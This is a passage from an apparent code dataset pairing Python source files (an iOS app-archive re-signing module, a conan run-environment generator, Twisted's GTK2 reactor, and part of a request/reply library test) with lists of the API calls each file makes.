shutil.rmtree(temp_zip_dir)
class IpaArchive(AppZipArchive):
""" IPA is Apple's standard for distributing apps. Much like an AppZip,
but slightly different paths """
extensions = ['.ipa']
app_dir_pattern = r'^(Payload/[^/]+\.app/).*$'
class UncompressedArchive(object):
""" This just keeps track of some state with an unzipped app archive and
how to re-zip it back up once re-signed. The bundle is located somewhere
inside the containing directory, but might be a few directories down, like in
a ContainingDir/Payload/something.app
This class is also useful if you have an app that's already unzipped and
you want to sign it. """
def __init__(self, path, relative_bundle_dir, archive_class):
""" Path is the "Containing dir", the dir at the root level of the unzipped archive
(or the dir itself, in the case of an AppArchive archive)
relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app
archive class is the kind of archive this was (Ipa, etc.) """
self.path = path
self.relative_bundle_dir = relative_bundle_dir
self.archive_class = archive_class
bundle_path = normpath(join(path, relative_bundle_dir))
self.bundle = App(bundle_path)
def archive(self, output_path):
""" Re-zip this back up, or simply copy it out, depending on what the
original archive class did """
self.archive_class.archive(self.path, output_path)
def clone(self, target_path):
""" Copy the uncompressed archive somewhere else, return initialized
UncompressedArchive """
shutil.copytree(self.path, target_path)
return self.__class__(target_path,
self.relative_bundle_dir,
self.archive_class)
def remove(self):
# the containing dir might be gone already b/c AppArchive simply moves
# it to the desired target when done
if exists(self.path) and isdir(self.path):
log.debug('removing ua: %s', self.path)
shutil.rmtree(self.path)
def archive_factory(path):
""" Guess what kind of archive we are dealing with, return an
archive object. Returns None if path did not match any archive type """
archive = None
for cls in [IpaArchive, AppZipArchive, AppArchive]:
if cls.precheck(path):
archive = cls(path)
log.debug("File %s matched as %s", path, cls.__name__)
break
return archive
def view(input_path):
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotMatched('No matching archive type found')
ua = archive.unarchive_to_temp()
bundle_info = ua.bundle.info
finally:
if ua is not None:
ua.remove()
return bundle_info
def resign(input_path,
certificate,
key,
apple_cert,
provisioning_profile,
output_path,
info_props=None,
alternate_entitlements_path=None):
""" Unified interface to extract any kind of archive from
a temporary file, resign it with these credentials,
and create a similar archive for that resigned app """
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
log.debug('Signing with apple_cert: {}'.format(apple_cert))
log.debug('Signing with key: {}'.format(key))
log.debug('Signing with certificate: {}'.format(certificate))
log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile))
signer = Signer(signer_cert_file=certificate,
signer_key_file=key,
apple_cert_file=apple_cert)
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotSignable('No matching archive type found')
ua = archive.unarchive_to_temp()
if info_props:
# Override info.plist props of the parent bundle
ua.bundle.update_info_props(info_props)
ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path)
bundle_info = ua.bundle.info
ua.archive(output_path)
except NotSignable as e:
msg = "Not signable: <{0}>: {1}\n".format(input_path, e)
log.info(msg)
raise
finally:
if ua is not None:
ua.remove()
return bundle_info
| [
"logging.getLogger",
"exceptions.MissingHelpers",
"signer.Signer",
"zipfile.ZipFile",
"exceptions.NotMatched",
"os.walk",
"os.path.exists",
"shutil.move",
"bundle.is_info_plist_native",
"bundle.Bundle",
"os.path.isdir",
"biplist.readPlistFromString",
"exceptions.NotSignable",
"re.match",
"os.path.isfile",
"os.path.dirname",
"tempfile.mkdtemp",
"zipfile.is_zipfile",
"distutils.spawn.find_executable",
"os.path.join",
"bundle.App",
"shutil.copytree",
"shutil.rmtree"
] | [((706, 733), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (723, 733), False, 'import logging\n'), ((1296, 1329), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-"""'}), "(prefix='isign-')\n", (1312, 1329), False, 'import tempfile\n'), ((1790, 1815), 'os.walk', 'os.walk', (['root_bundle_path'], {}), '(root_bundle_path)\n', (1797, 1815), False, 'import os\n'), ((14421, 14511), 'signer.Signer', 'Signer', ([], {'signer_cert_file': 'certificate', 'signer_key_file': 'key', 'apple_cert_file': 'apple_cert'}), '(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=\n apple_cert)\n', (14427, 14511), False, 'from signer import Signer\n'), ((1053, 1087), 'distutils.spawn.find_executable', 'spawn.find_executable', (['helper_name'], {}), '(helper_name)\n', (1074, 1087), False, 'from distutils import spawn\n'), ((4526, 4553), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (4546, 4553), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((4702, 4721), 'os.path.exists', 'exists', (['output_path'], {}), '(output_path)\n', (4708, 4721), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4770, 4800), 'shutil.move', 'shutil.move', (['path', 'output_path'], {}), '(path, output_path)\n', (4781, 4800), False, 'import shutil\n'), ((5179, 5208), 'shutil.rmtree', 'shutil.rmtree', (['containing_dir'], {}), '(containing_dir)\n', (5192, 5208), False, 'import shutil\n'), ((5267, 5309), 'shutil.copytree', 'shutil.copytree', (['self.path', 'containing_dir'], {}), '(self.path, containing_dir)\n', (5282, 5309), False, 'import shutil\n'), ((7158, 7197), 'os.path.join', 'join', (['relative_bundle_dir', '"""Info.plist"""'], {}), "(relative_bundle_dir, 'Info.plist')\n", (7162, 7197), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((8621, 8661), 'biplist.readPlistFromString', 'biplist.readPlistFromString', (['plist_bytes'], {}), '(plist_bytes)\n', (8648, 8661), False, 'import biplist\n'), ((8740, 8761), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (8755, 8761), False, 'import zipfile\n'), ((11904, 11920), 'bundle.App', 'App', (['bundle_path'], {}), '(bundle_path)\n', (11907, 11920), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((12294, 12333), 'shutil.copytree', 'shutil.copytree', (['self.path', 'target_path'], {}), '(self.path, target_path)\n', (12309, 12333), False, 'import shutil\n'), ((13222, 13240), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (13228, 13240), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((14064, 14082), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (14070, 14082), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((1909, 1921), 'bundle.Bundle', 'Bundle', (['path'], {}), '(path)\n', (1915, 1921), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((2805, 2852), 'exceptions.NotSignable', 'NotSignable', (['"""Cannot yet sign WatchKit bundles"""'], {}), "('Cannot yet sign WatchKit bundles')\n", (2816, 2852), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((4350, 4361), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\n', (4355, 4361), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4735, 4761), 'shutil.rmtree', 'shutil.rmtree', (['output_path'], {}), '(output_path)\n', (4748, 4761), False, 'import shutil\n'), ((6664, 6704), 're.match', 're.match', (['cls.app_dir_pattern', 'file_name'], {}), '(cls.app_dir_pattern, file_name)\n', (6672, 6704), False, 'import re\n'), ((7495, 7507), 'os.path.isfile', 'isfile', (['path'], {}), '(path)\n', (7501, 7507), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((7593, 7630), 'exceptions.MissingHelpers', 'MissingHelpers', (['"""helpers not present"""'], {}), "('helpers not present')\n", (7607, 7630), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((7792, 7816), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path'], {}), '(path)\n', (7810, 7816), False, 'import zipfile\n'), ((7904, 7925), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (7919, 7925), False, 'import zipfile\n'), ((9129, 9175), 'os.path.join', 'join', (['containing_dir', 'self.relative_bundle_dir'], {}), '(containing_dir, self.relative_bundle_dir)\n', (9133, 9175), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10199, 10236), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-zip-"""'}), "(prefix='isign-zip-')\n", (10215, 10236), False, 'import tempfile\n'), ((10265, 10295), 'os.path.join', 'join', (['temp_zip_dir', '"""temp.zip"""'], {}), "(temp_zip_dir, 'temp.zip')\n", (10269, 10295), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10393, 10432), 'shutil.move', 'shutil.move', (['temp_zip_file', 'output_path'], {}), '(temp_zip_file, output_path)\n', (10404, 10432), False, 'import shutil\n'), ((11849, 11880), 'os.path.join', 'join', (['path', 'relative_bundle_dir'], {}), '(path, relative_bundle_dir)\n', (11853, 11880), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12641, 12658), 'os.path.exists', 'exists', (['self.path'], {}), '(self.path)\n', (12647, 12658), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12663, 12679), 'os.path.isdir', 'isdir', (['self.path'], {}), '(self.path)\n', (12668, 12679), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12745, 12769), 'shutil.rmtree', 'shutil.rmtree', (['self.path'], {}), '(self.path)\n', (12758, 12769), False, 'import shutil\n'), ((13438, 13482), 'exceptions.NotMatched', 'NotMatched', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (13448, 13482), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((14686, 14731), 'exceptions.NotSignable', 'NotSignable', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (14697, 14731), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((2144, 2157), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\n', (2151, 2157), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((2753, 2772), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (2766, 2772), False, 'import shutil\n'), ((8304, 8331), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (8324, 8331), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((10566, 10585), 'os.path.isdir', 'isdir', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10571, 10585), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10603, 10630), 'shutil.rmtree', 'shutil.rmtree', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10616, 10630), False, 'import shutil\n')] |
from conan.tools.env import Environment
def runenv_from_cpp_info(conanfile, cpp_info):
""" return an Environment deducing the runtime information from a cpp_info
"""
dyn_runenv = Environment(conanfile)
if cpp_info is None: # This happens when the dependency is a private one = BINARY_SKIP
return dyn_runenv
if cpp_info.bin_paths: # cpp_info.exes is not defined yet
dyn_runenv.prepend_path("PATH", cpp_info.bin_paths)
# If it is a build_require this will be the build-os, otherwise it will be the host-os
if cpp_info.lib_paths:
dyn_runenv.prepend_path("LD_LIBRARY_PATH", cpp_info.lib_paths)
dyn_runenv.prepend_path("DYLD_LIBRARY_PATH", cpp_info.lib_paths)
if cpp_info.framework_paths:
dyn_runenv.prepend_path("DYLD_FRAMEWORK_PATH", cpp_info.framework_paths)
return dyn_runenv
class VirtualRunEnv:
""" captures the conanfile environment that is defined from its
dependencies, and also from profiles
"""
def __init__(self, conanfile):
self._conanfile = conanfile
def environment(self):
""" collects the runtime information from dependencies. For normal libraries should be
very occasional
"""
runenv = Environment(self._conanfile)
# FIXME: Missing profile info
# FIXME: Cache value?
host_req = self._conanfile.dependencies.host
test_req = self._conanfile.dependencies.test
for _, dep in list(host_req.items()) + list(test_req.items()):
if dep.runenv_info:
runenv.compose_env(dep.runenv_info)
runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info))
return runenv
def generate(self, auto_activate=False):
run_env = self.environment()
if run_env:
run_env.save_script("conanrunenv", auto_activate=auto_activate)
| [
"conan.tools.env.Environment"
] | [((193, 215), 'conan.tools.env.Environment', 'Environment', (['conanfile'], {}), '(conanfile)\n', (204, 215), False, 'from conan.tools.env import Environment\n'), ((1243, 1271), 'conan.tools.env.Environment', 'Environment', (['self._conanfile'], {}), '(self._conanfile)\n', (1254, 1271), False, 'from conan.tools.env import Environment\n')] |
# -*- test-case-name: twisted.internet.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides support for Twisted to interact with the glib/gtk2
mainloop.
In order to use this support, simply do the following::
| from twisted.internet import gtk2reactor
| gtk2reactor.install()
Then use twisted.internet APIs as usual. The other methods here are not
intended to be called directly.
When installing the reactor, you can choose whether to use the glib
event loop or the GTK+ event loop which is based on it but adds GUI
integration.
"""
# System Imports
import sys, signal
from zope.interface import implements
try:
if not hasattr(sys, 'frozen'):
# Don't want to check this for py2exe
import pygtk
pygtk.require('2.0')
except (ImportError, AttributeError):
pass # maybe we're using pygtk before this hack existed.
import gobject
if hasattr(gobject, "threads_init"):
# recent versions of python-gtk expose this. python-gtk=2.4.1
# (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping
# glib-2.2.3) does not.
gobject.threads_init()
# Twisted Imports
from twisted.python import log, runtime, failure
from twisted.python.compat import set
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import main, base, posixbase, error, selectreactor
POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL
# glib's iochannel sources won't tell us about any events that we haven't
# asked for, even if those events aren't sensible inputs to the poll()
# call.
INFLAGS = gobject.IO_IN | POLL_DISCONNECTED
OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED
def _our_mainquit():
# XXX: gtk.main_quit() (which is used for crash()) raises an exception if
# gtk.main_level() == 0; however, all the tests freeze if we use this
# function to stop the reactor. what gives? (I believe this may have been
# a stupid mistake where I forgot to import gtk here... I will remove this
# comment if the tests pass)
import gtk
if gtk.main_level():
gtk.main_quit()
class Gtk2Reactor(posixbase.PosixReactorBase):
"""
GTK+-2 event loop reactor.
@ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk
watch handles.
@ivar _reads: A set of L{FileDescriptor} instances currently monitored for
reading.
@ivar _writes: A set of L{FileDescriptor} instances currently monitored for
writing.
@ivar _simtag: A gtk timeout handle for the next L{simulate} call.
"""
implements(IReactorFDSet)
def __init__(self, useGtk=True):
self._simtag = None
self._reads = set()
self._writes = set()
self._sources = {}
posixbase.PosixReactorBase.__init__(self)
# pre 2.3.91 the glib iteration and mainloop functions didn't release
# global interpreter lock, thus breaking thread and signal support.
if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk:
self.context = gobject.main_context_default()
self.__pending = self.context.pending
self.__iteration = self.context.iteration
self.loop = gobject.MainLoop()
self.__crash = self.loop.quit
self.__run = self.loop.run
else:
import gtk
self.__pending = gtk.events_pending
self.__iteration = gtk.main_iteration
self.__crash = _our_mainquit
self.__run = gtk.main
if runtime.platformType == 'posix':
def _handleSignals(self):
# Let the base class do its thing, but pygtk is probably
# going to stomp on us so go beyond that and set up some
# signal handling which pygtk won't mess with. This would
# be better done by letting this reactor select a
# different implementation of installHandler for
# _SIGCHLDWaker to use. Then, at least, we could fall
# back to our extension module. See #4286.
from twisted.internet.process import reapAllProcesses as _reapAllProcesses
base._SignalReactorMixin._handleSignals(self)
signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses))
if getattr(signal, "siginterrupt", None) is not None:
signal.siginterrupt(signal.SIGCHLD, False)
# Like the base, reap processes now in case a process
# exited before the handlers above were installed.
_reapAllProcesses()
# The input_add function in pygtk1 checks for objects with a
# 'fileno' method and, if present, uses the result of that method
# as the input source. The pygtk2 input_add does not do this. The
# function below replicates the pygtk1 functionality.
# In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and
# g_io_add_watch() takes different condition bitfields than
# gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this
# bug.
def input_add(self, source, condition, callback):
if hasattr(source, 'fileno'):
# handle python objects
def wrapper(source, condition, real_s=source, real_cb=callback):
return real_cb(real_s, condition)
return gobject.io_add_watch(source.fileno(), condition, wrapper)
else:
return gobject.io_add_watch(source, condition, callback)
def _add(self, source, primary, other, primaryFlag, otherFlag):
"""
Add the given L{FileDescriptor} for monitoring either for reading or
writing. If the file is already monitored for the other operation, we
delete the previous registration and re-register it for both reading
and writing.
"""
if source in primary:
return
flags = primaryFlag
if source in other:
gobject.source_remove(self._sources[source])
flags |= otherFlag
self._sources[source] = self.input_add(source, flags, self.callback)
primary.add(source)
def addReader(self, reader):
"""
Add a L{FileDescriptor} for monitoring of data available to read.
"""
self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS)
def addWriter(self, writer):
"""
Add a L{FileDescriptor} for monitoring ability to write data.
"""
self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS)
def getReaders(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for reading.
"""
return list(self._reads)
def getWriters(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for writing.
"""
return list(self._writes)
def removeAll(self):
"""
Remove monitoring for all registered L{FileDescriptor}s.
"""
return self._removeAll(self._reads, self._writes)
def _remove(self, source, primary, other, flags):
"""
Remove monitoring the given L{FileDescriptor} for either reading or
writing. If it's still monitored for the other operation, we
re-register the L{FileDescriptor} for only that operation.
"""
if source not in primary:
return
gobject.source_remove(self._sources[source])
primary.remove(source)
if source in other:
self._sources[source] = self.input_add(
source, flags, self.callback)
else:
self._sources.pop(source)
def removeReader(self, reader):
"""
Stop monitoring the given L{FileDescriptor} for reading.
"""
self._remove(reader, self._reads, self._writes, OUTFLAGS)
def removeWriter(self, writer):
"""
Stop monitoring the given L{FileDescriptor} for writing.
"""
self._remove(writer, self._writes, self._reads, INFLAGS)
doIterationTimer = None
def doIterationTimeout(self, *args):
self.doIterationTimer = None
return 0 # auto-remove
def doIteration(self, delay):
# flush some pending events, return if there was something to do
# don't use the usual "while self.context.pending(): self.context.iteration()"
# idiom because lots of IO (in particular test_tcp's
# ProperlyCloseFilesTestCase) can keep us from ever exiting.
log.msg(channel='system', event='iteration', reactor=self)
if self.__pending():
self.__iteration(0)
return
# nothing to do, must delay
if delay == 0:
return # shouldn't delay, so just return
self.doIterationTimer = gobject.timeout_add(int(delay * 1000),
self.doIterationTimeout)
# This will either wake up from IO or from a timeout.
self.__iteration(1) # block
# note: with the .simulate timer below, delays > 0.1 will always be
# woken up by the .simulate timer
if self.doIterationTimer:
# if woken by IO, need to cancel the timer
gobject.source_remove(self.doIterationTimer)
self.doIterationTimer = None
def crash(self):
posixbase.PosixReactorBase.crash(self)
self.__crash()
def run(self, installSignalHandlers=1):
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
if self._started:
self.__run()
def _doReadOrWrite(self, source, condition, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost()),
}):
why = None
inRead = False
if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN):
if source in self._reads:
why = main.CONNECTION_DONE
inRead = True
else:
why = main.CONNECTION_LOST
else:
try:
if condition & gobject.IO_IN:
why = source.doRead()
inRead = True
if not why and condition & gobject.IO_OUT:
# if doRead caused connectionLost, don't call doWrite
# if doRead is doWrite, don't call it again.
if not source.disconnected:
why = source.doWrite()
except:
why = sys.exc_info()[1]
log.msg('Error In %s' % source)
log.deferr()
if why:
self._disconnectSelectable(source, why, inRead)
def callback(self, source, condition):
log.callWithLogger(source, self._doReadOrWrite, source, condition)
self.simulate() # fire Twisted timers
return 1 # 1=don't auto-remove the source
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.runUntilCurrent()
timeout = min(self.timeout(), 0.1)
if timeout is None:
timeout = 0.1
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
class PortableGtkReactor(selectreactor.SelectReactor):
"""
Reactor that works on Windows.
Sockets aren't supported by GTK+'s input_add on Win32.
"""
_simtag = None
def crash(self):
selectreactor.SelectReactor.crash(self)
import gtk
# mainquit is deprecated in newer versions
if gtk.main_level():
if hasattr(gtk, 'main_quit'):
gtk.main_quit()
else:
gtk.mainquit()
def run(self, installSignalHandlers=1):
import gtk
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
# mainloop is deprecated in newer versions
if hasattr(gtk, 'main'):
gtk.main()
else:
gtk.mainloop()
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.iterate()
timeout = min(self.timeout(), 0.1)
if timeout is None:
timeout = 0.1
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
def install(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
@param useGtk: should glib rather than GTK+ event loop be
used (this will be slightly faster but does not support GUI).
"""
reactor = Gtk2Reactor(useGtk)
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
def portableInstall(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
"""
reactor = PortableGtkReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
if runtime.platform.getType() != 'posix':
install = portableInstall
__all__ = ['install']
| [
"twisted.internet.posixbase.PosixReactorBase.__init__",
"twisted.internet.process.reapAllProcesses",
"zope.interface.implements",
"signal.siginterrupt",
"sys.exc_info",
"twisted.python.log.deferr",
"twisted.python.runtime.platform.getType",
"twisted.internet.error.ConnectionDone",
"twisted.internet.posixbase.PosixReactorBase.crash",
"twisted.python.compat.set",
"gtk.main_level",
"gtk.mainquit",
"gtk.main_quit",
"gobject.threads_init",
"twisted.python.log.msg",
"pygtk.require",
"twisted.python.log.callWithLogger",
"gobject.main_context_default",
"gobject.MainLoop",
"gtk.main",
"twisted.internet.main.installReactor",
"twisted.internet.error.ConnectionLost",
"twisted.internet.base._SignalReactorMixin._handleSignals",
"gobject.io_add_watch",
"twisted.internet.selectreactor.SelectReactor.crash",
"gobject.timeout_add",
"gobject.source_remove",
"gtk.mainloop"
] | [((1126, 1148), 'gobject.threads_init', 'gobject.threads_init', ([], {}), '()\n', (1146, 1148), False, 'import gobject\n'), ((2087, 2103), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (2101, 2103), False, 'import gtk\n'), ((2597, 2622), 'zope.interface.implements', 'implements', (['IReactorFDSet'], {}), '(IReactorFDSet)\n', (2607, 2622), False, 'from zope.interface import implements\n'), ((12990, 13013), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13004, 13013), False, 'from twisted.internet.main import installReactor\n'), ((13248, 13271), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13262, 13271), False, 'from twisted.internet.main import installReactor\n'), ((13297, 13323), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ([], {}), '()\n', (13321, 13323), False, 'from twisted.python import log, runtime, failure\n'), ((795, 815), 'pygtk.require', 'pygtk.require', (['"""2.0"""'], {}), "('2.0')\n", (808, 815), False, 'import pygtk\n'), ((2113, 2128), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (2126, 2128), False, 'import gtk\n'), ((2711, 2716), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2714, 2716), False, 'from twisted.python.compat import set\n'), ((2740, 2745), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2743, 2745), False, 'from twisted.python.compat import set\n'), ((2781, 2822), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', (['self'], {}), '(self)\n', (2816, 2822), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((7418, 7462), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (7439, 7462), False, 'import gobject\n'), ((8531, 8589), 'twisted.python.log.msg', 'log.msg', ([], {'channel': '"""system"""', 'event': '"""iteration"""', 'reactor': 'self'}), "(channel='system', event='iteration', reactor=self)\n", (8538, 8589), False, 'from twisted.python import log, runtime, failure\n'), ((9360, 9398), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', (['self'], {}), '(self)\n', (9392, 9398), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9547, 9584), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (9566, 9584), False, 'import gobject\n'), ((10856, 10922), 'twisted.python.log.callWithLogger', 'log.callWithLogger', (['source', 'self._doReadOrWrite', 'source', 'condition'], {}), '(source, self._doReadOrWrite, source, condition)\n', (10874, 10922), False, 'from twisted.python import log, runtime, failure\n'), ((11652, 11691), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', (['self'], {}), '(self)\n', (11685, 11691), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11773, 11789), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (11787, 11789), False, 'import gtk\n'), ((12058, 12095), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (12077, 12095), False, 'import gobject\n'), ((3083, 3113), 'gobject.main_context_default', 'gobject.main_context_default', ([], {}), '()\n', (3111, 3113), False, 'import gobject\n'), ((3242, 3260), 'gobject.MainLoop', 'gobject.MainLoop', ([], {}), '()\n', (3258, 3260), False, 'import gobject\n'), ((4182, 4227), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', (['self'], {}), '(self)\n', (4221, 4227), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((4587, 4606), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ([], {}), '()\n', (4604, 4606), True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n'), ((5463, 5512), 'gobject.io_add_watch', 'gobject.io_add_watch', (['source', 'condition', 'callback'], {}), '(source, condition, callback)\n', (5483, 5512), False, 'import gobject\n'), ((5977, 6021), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (5998, 6021), False, 'import gobject\n'), ((9243, 9287), 'gobject.source_remove', 'gobject.source_remove', (['self.doIterationTimer'], {}), '(self.doIterationTimer)\n', (9264, 9287), False, 'import gobject\n'), ((11173, 11208), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (11194, 11208), False, 'import gobject\n'), ((12192, 12202), 'gtk.main', 'gtk.main', ([], {}), '()\n', (12200, 12202), False, 'import gtk\n'), ((12229, 12243), 'gtk.mainloop', 'gtk.mainloop', ([], {}), '()\n', (12241, 12243), False, 'import gtk\n'), ((12398, 12433), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (12419, 12433), False, 'import gobject\n'), ((4403, 4445), 'signal.siginterrupt', 'signal.siginterrupt', (['signal.SIGCHLD', '(False)'], {}), '(signal.SIGCHLD, False)\n', (4422, 4445), False, 'import sys, signal\n'), ((9743, 9765), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ([], {}), '()\n', (9763, 9765), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9814, 9836), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ([], {}), '()\n', (9834, 9836), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11849, 11864), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (11862, 11864), False, 'import gtk\n'), ((11899, 11913), 'gtk.mainquit', 'gtk.mainquit', ([], {}), '()\n', (11911, 11913), False, 'import gtk\n'), ((10665, 10696), 'twisted.python.log.msg', 'log.msg', (["('Error In %s' % source)"], {}), "('Error In %s' % source)\n", (10672, 10696), False, 'from twisted.python import log, runtime, failure\n'), ((10713, 10725), 'twisted.python.log.deferr', 'log.deferr', ([], {}), '()\n', (10723, 10725), False, 'from twisted.python import log, runtime, failure\n'), ((10631, 10645), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10643, 10645), False, 'import sys, signal\n')] |
# -*- coding: utf-8 -*-
from unittest import TestCase, TestLoader
from radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound,
HandlerAlreadyBound)
def init_radio(f):
def wrap(self, *args):
self.radio = Radio()
return f(self, *args)
return wrap
class TestRadioRequestReplyMethods(TestCase):
@init_radio
def test_request_reply_stop_replying(self):
'''
"request", "reply" and "stopReplying" methods work correctly.
'''
def foo_handler(): return 'foo'
def bar_handler(my_arg=222): return my_arg
self.radio.reply('foo', foo_handler)
self.radio.reply('bar', bar_handler)
self.assertEqual(self.radio.request('foo'), 'foo')
self.assertEqual(self.radio.request('bar'), 222)
self.assertEqual(self.radio.request('bar', 333), 333)
self.assertEqual(self.radio.request('bar', my_arg=444), 444)
self.radio.stopReplying('foo')
self.radio.stopReplying('bar')
with self.assertRaises(ListenerNotFound):
self.radio.request('foo')
with self.assertRaises(ListenerNotFound):
self.radio.request('bar')
@init_radio
def test_kwargs(self):
'''
Keyword arguments works correctly.
'''
foo_list = []
def foo_handler(foo, bar): return (foo, bar)
self.radio.reply('foo', foo_handler)
self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5))
@init_radio
def test_on_already_bound(self):
'''
"reply" fails when trying to bound handler that is already bounded.
'''
def foo_handler(): pass
self.radio.reply('foo', foo_handler)
self.radio.reply('bar', foo_handler)
# General exception
with self.assertRaises(HandlerAlreadyBound):
